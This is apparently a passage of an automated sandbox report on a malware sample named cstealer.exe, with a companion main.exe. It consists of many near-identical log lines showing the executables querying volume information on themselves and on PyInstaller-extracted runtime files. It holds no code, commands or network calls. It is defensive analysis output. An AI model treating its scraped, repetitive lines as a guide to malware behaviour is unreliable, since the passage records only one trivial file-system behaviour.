                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI38562 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\certifi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\main.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\main.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\cstealer.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI11282\base_library.zip VolumeInformationJump to behavior
